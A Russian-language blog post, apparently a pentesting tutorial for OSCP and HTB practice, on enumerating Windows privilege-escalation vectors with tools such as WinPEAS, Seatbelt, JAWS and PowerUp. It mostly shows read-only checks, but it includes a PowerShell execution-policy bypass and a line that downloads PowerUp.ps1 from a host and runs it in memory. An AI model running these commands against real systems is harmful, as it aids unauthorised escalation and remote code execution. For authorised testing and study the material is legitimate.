После первоначального доступа к Windows‑хосту (обычно это базовая shell/метерпитетер) злоумышленник или тестировщик (аха, то есть мы) часто ограничен правами. Чтобы повысить привилегии, требуется быстро перечислить файлы, директории, права, журналы и хранилища (SAM и др.). Объём артефактов в Windows огромен, и ручная проверка даже при хорошем опыте занимает много времени. Логичный путь — автоматизировать перечисление с помощью скриптов и чекеров. Тема незаменима на экзамене OSCP и при прохождении тачек на HTB.

«Эскалация привилегий» — стадия после компрометации, в рамках которой собирается критичная для системы информация: скрытые пароли, слабоконфигурированные службы/приложения, уязвимые политики, кривой доступ, лишние сервисы в RAM и т.д. Именно эти сведения позволяют выполнить пост‑эксплуатацию и получить более высокий уровень прав.

Критичные векторы повышения привилегий в Windows

  • Версия ОС и билд.

  • Уязвимые/устаревшие пакеты и компоненты.

  • Каталоги и файлы с правами Modify/Full Control у обычных пользователей.

  • Сопоставленные сетевые диски, шары DFS.

  • Потенциально интересные файлы (ключи, конфиги, бэкапы).

  • Нековыченные пути служб (Unquoted Service Paths).

  • Сетевые сведения: интерфейсы/ARP/netstat.

  • Состояние и правила брандмауэра.

  • Запущенные в RAM процессы.

  • Проверка реестра AlwaysInstallElevated (HKLM/HKCU).

  • Сохранённые учётные данные/креды.

  • DLL‑Hijacking и порядок поиска библиотек.

  • Планировщик заданий (Scheduled Tasks).

Ниже — набор скриптов, которыми удобно быстро находить такие векторы.

Инструменты перечисления (тестировано на Windows 10/11)

SharpUp

.NET‑утилита для поиска слабых служб, прав на каталоги/бинарники, некорректных путей и опасных политик. Работает не оч быстро, но всегда в арсенале

SharpUp: слабые службы, unquoted paths, AlwaysInstallElevated
SharpUp: слабые службы, unquoted paths, AlwaysInstallElevated
SharpUp.exe audit

WinPEAS

Классический чекер PE‑векторов: службы, каталоги PATH, AlwaysInstallElevated, токены и др. Простенько, но со вкусом!

WinPEAS: обзор ОС, службы, AlwaysInstallElevated, токены
WinPEAS: обзор ОС, службы, AlwaysInstallElevated, токены
winPEASx64.exe quiet

Seatbelt

Сбор артефактов конфигурации (группами), включая привилегии, установленный софт, службы и многое другое. Удобно и быстро!

Seatbelt: привилегии токена, софт, unquoted service paths
Seatbelt: привилегии токена, софт, unquoted service paths
Seatbelt.exe -group=system

JAWS (Just Another Windows Enum Script)

PowerShell‑скрипт общего перечисления: пользователи/группы, службы с небезопасными правами, задания и пр. Шустрый скрипт!

JAWS: небезопасные службы и задания SYSTEM
JAWS: небезопасные службы и задания SYSTEM
powershell -ep bypass -c "IEX (Get-Content .\jaws.ps1 -Raw); Invoke-Jaws"

PowerShell Empire — PowerUp

Модуль PowerUp проверяет и демонстрирует эксплуатацию типичных мисконфигов (службы, реестр, кавычки, ACL).

PowerUp: модифицируемые службы, unquoted paths, AlwaysInstallElevated
PowerUp: модифицируемые службы, unquoted paths, AlwaysInstallElevated
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://intranet/PowerUp.ps1'); Invoke-AllChecks"

PowerShell Empire — Sherlock

Исторический модуль для поиска известных локальных уязвимостей (MS16‑032 и др.); полезен в лабораториях. Шерлок оправдывает свое название :)

Sherlock: пример обнаружения MS16-032 (только для lab)
Sherlock: пример обнаружения MS16-032 (только для lab)
Import-Module .\Sherlock.ps1; Find-AllVulns

Практические техники (короткий обзор)

Слабые службы и некавыченные пути

Служба LocalSystem с изменяемым каталогом — кандидат на перехват
Служба LocalSystem с изменяемым каталогом — кандидат на перехват
sc qc "Vuln Service"
icacls "C:\Program Files\Vuln Service"

Планировщик заданий

SYSTEM‑задание, указывающее на изменяемый файл
SYSTEM‑задание, указывающее на изменяемый файл
schtasks /query /fo LIST /v

Смотрим AlwaysInstallElevated

HKLM/HKCU: AlwaysInstallElevated = 1
HKLM/HKCU: AlwaysInstallElevated = 1
reg query HKCU\...\Installer /v AlwaysInstallElevated
reg query HKLM\...\Installer /v AlwaysInstallElevated

Привилегии токена

SeImpersonatePrivilege включён — возможны техники импёрсонации
SeImpersonatePrivilege включён — возможны техники импёрсонации
whoami /priv

Права на каталоги

Каталог в ProgramData доступен для изменения обычным пользователем
Каталог в ProgramData доступен для изменения обычным пользователем
icacls "C:\ProgramData\Apps\TestApp"

Ну, вот в принципе и все! Самые известные (мне) и ходовые тулзы. Ни разу не подвели на CTF и помогут на OSCP.

! Официальная документация !

Ссылки: утилиты и скрипты

Заключение

Повышение привилегий в Windows чаще всего упирается в конфигурационные огрехи: права на каталоги, службы, планировщик, MSI‑политики и привилегии токена. Автоматизированные чекеры ускоряют первичное перечисление, но итог всегда должен быть подтверждён вручную и оформлен в отчёте с рекомендациями по исправлению. Ну, что сохраняй в закладки!

Комментарии (0)